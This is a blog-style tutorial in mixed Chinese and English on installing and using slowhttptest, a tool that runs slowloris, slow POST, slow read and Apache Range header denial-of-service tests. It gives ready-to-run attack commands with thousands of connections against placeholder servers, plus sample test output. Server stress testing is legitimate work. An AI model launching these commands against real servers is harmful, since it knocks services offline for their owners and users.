slowhttptest

發佈日期: 作者:

slowhttptest

Application Layer DoS attacks tool
support below
 * slowloris, Slow HTTP POST, Slow Read attack (concurrent connections consumption)
 * Apache Range Header attack ( memory and CPU consumption, CVE-2011-3192)
refer
https://code.google.com/p/slowhttptest/
Slow Read DoS attack explained
http://www.xlgps.com/article/53972.html

 

Download

https://code.google.com/p/slowhttptest/downloads/list

Installation

$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=< PREFIX>
$ make
$ sudo make install

test your tool

$< PREFIX>/bin/slowhttptest

 

基本攻擊

1.choose attack type

-B: enables slow POST test
-H: enables slow head test
-X: enables slow read test
-R: enables range test

2.choose target

-u < URL> :target URL, format is http[s]://< host [:port] >

ex:
-u https://myseceureserverl

3.choose basic paramater

-c < number> : number of connections , limited to 65539, default 50
-r < number> : connections per second connection rate, default 50
ps:有些linux本身會限制4000個連線,若工具超過此數值一樣僅使用4000連線,若非將linux限制解除
ex: ulimit -n 65535

refer
https://github.com/shekyan/slowhttptest/wiki/InstallationAndUsage

 

optinoal. paramater for information

-p < sec> : seconds timeout to wait for HTTP response on probe connection, after which server is considered inaccessible, default 5

-g : generate statistics in CSV and HTML formats, pattern is slow_xxx.csv/html, where xxx is the time and date

-o < string> ex: -o my_body_stats

-v < level>
level1: default, every 5 seconds showing status of connections
level4: full traffic dump

 

other paramater

-l < sec>: test duration in seconds, default 240
-t < custom string>: verb custom verb to use ex: -t FAKEVERB

代理伺服器

-d < proxy host>: for directing all traffic through web proxy
-e < proxy host>: for directing only probe traffic through web proxy

 

指定進階攻擊 post or header attack

每隔幾秒送一次資料

-i < sec> : interval between follow up data per connection, default 10

ex:
-i 100
Interval between follow up data 100 seconds

指定body一次送出的資料量

-x < byte> : max length of follow up data

ex:
-x 1 or -x 2
Test parameters: follow up data max size: 8
-x 3
Test parameters: follow up data max size: 10
-x 24
Test parameters: follow up data max size: 52

ps:
head產生的最後值是輸入值2+4
post產生的最後值是輸入值2+2
ps:
最後實際與目標協商後的值還會變,此值僅供參考

 

指定post body長度

-s < byte> : Content-Length header value, default 4096 , if -B specified
ps: header不適用, 因為預設會一直傳( 也就是不傳送結束字元/r/n)

 

post和header攻擊範例

message body mode (post)
ex:
slowhttptest -c 1000 -B -i 10 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserverl -x 10 -p 3

slowloris mode (header)
ex:
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver -x 24 -p 3

 

指定進階攻擊 read attack

指定windows size隨機範圍

-w < byte> : bytes start of range the advertised window size would be picked from
-y < byte> : bytes end of range the advertised window size would be picked from

ex:
-w 10 -y 20 would make below
receive window range: 10 - 20

ps: 此值和目標協商後,最後的值會不同

-n < sec> : seconds interval between read operations from receive buffer, default=1
-z < bytes> : to read from receive buffer with single read() operation, default=5

ex:  
-z 32 -n 5 would make below
read rate from receive buffer: 32 bytes / 5 sec

-k < number> : pipeline factor number of times to repeat the request in the same connection for slow read test if server supports HTTP pipe-lining.
server要先支援此功能

ex:
-k 10
Test parameters: Pipeline factor 10

ps:
Pipelined Connections : 在一個connection 中同步發送 HTTP requests HTTP 1.1 允許在 persistent connections使用 Pipelining,在 response 回來前,就先發送多個request,在 high-latency 的網路環境中可以大大改善效能。
refer( https://ihower.tw/blog/archives/1517 )

 

read攻擊範例

slow read
ex:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver -p 5 -l 350

slow read mode with probing through proxy
ex:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver -p 5 -l 350 -e x.x.x.x:8080

 

攻擊畫面如下:

SLOW BODY

Test parameters
Test type SLOW BODY
Number of connections 6000
Verb POST
Content-Length header value 4096
Extra data max length14
Interval between follow up data 30 seconds
Connections per seconds 200
Timeout for probe connection 3
Target test duration240 seconds
Using proxy no proxy

SLOW HEADERS

Test parameters
Test type SLOW HEADERS
Number of connections 6000
Verb GET
Content-Length header value 4096
Extra data max length 52
Interval between follow up data 10 seconds
Connections per seconds 200
Timeout for probe connection 3
Target test duration 240 seconds
Using proxy no proxy

SLOW READ

Test parameters
Test type SLOW READ
Number of connections 6000
Receive window range 5 - 15
Pipeline factor 1
Read rate from receive buffer 10 bytes / 3 sec
Connections per seconds 200
Timeout for probe connection 10
Target test duration 240 seconds
Using proxy no proxy